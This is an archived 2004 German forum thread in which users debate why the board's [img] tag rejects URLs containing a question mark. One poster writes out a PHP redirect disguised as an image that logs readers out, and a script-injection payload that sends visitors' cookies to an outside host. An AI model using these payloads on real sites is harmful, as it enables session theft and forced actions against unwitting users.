+- Politik-Talk (https://www.politik-talk.net)
+-- Forum: Verwaltung (https://www.politik-talk.net/forumdisplay.php?fid=4)
+--- Forum: Forenhilfe und Kritik (https://www.politik-talk.net/forumdisplay.php?fid=13)
+--- Thema: Problem mit dem [img]-Tag (/showthread.php?tid=471)
Problem mit dem [img]-Tag - System - 13.07.2004
ja, also der image tag ist im moment ziemlich kaputt, wenn man da einen img link mit einem ? benutzt so wie andreas da, wird das bild einfach nicht angezeigt. gut find ich das nicht
Problem mit dem [img]-Tag - tdd - 14.07.2004
Hi
@System, hab den beitrag mal hierher verschoben, da es hier besser reinpasst.
Es hat einen grund, weshalb es probleme mit dem "?" gibt. Man könnte sonst php befehle mit dem img-tag ausführen und niemand kann sich dagegen schützen.
Problem mit dem [img]-Tag - System - 14.07.2004
naja, ich kann einfach ein script schreiben, dass dann folgendes macht:
auftag?php header("Location: http://80.190.243.221/login.php?do=logout"); ?zutag
wenn ich dieses php script bei image tag hier einlinke, was im moment erlaubt ist und auch nicht gesperrt werden kann (ich kann scripte auch script.jpg nennen, meinem apache ist das ega, wenn das verzeichnis stimmtl), dann würde jeder leser des beitrages sofort abgemeldet werden. da es so geht, kann man das ? auch direkt erlauben.
Problem mit dem [img]-Tag - System - 14.07.2004
und da fällt mir auf, was ist mit folgendem trick:
<script>document.write('<img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'">')</script>
das bild wird erzeugt durch
Zitat:script document.write('img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'"') /scriptallerdings mit entsprechnen dreieckigen klammern dazu, doch leider kann man die hier nicht schreiben, ohne dass sie als html interpretiert werden und ich bin zu faul nachzusehen, wie die entities lauten
es geht natürlich auch als text:
<script>document.write(document.cookie)</script>
Problem mit dem [img]-Tag - tdd - 14.07.2004
Problem mit dem [img]-Tag - System - 14.07.2004
man baut nicht mehr lücken damit ein, sondern man blockiert nur eine bestimmte funktionalität, nämlich querystrings bei urls, die negative und positiven nutzen haben können. jedoch wird die negative nutzung nicht verhinder, da man mit einfachen tricks ja doch wieder alles kann. wer will hier überhaupt für jemand anders php sache ausführen? da würde man doch eh nur gebannt werden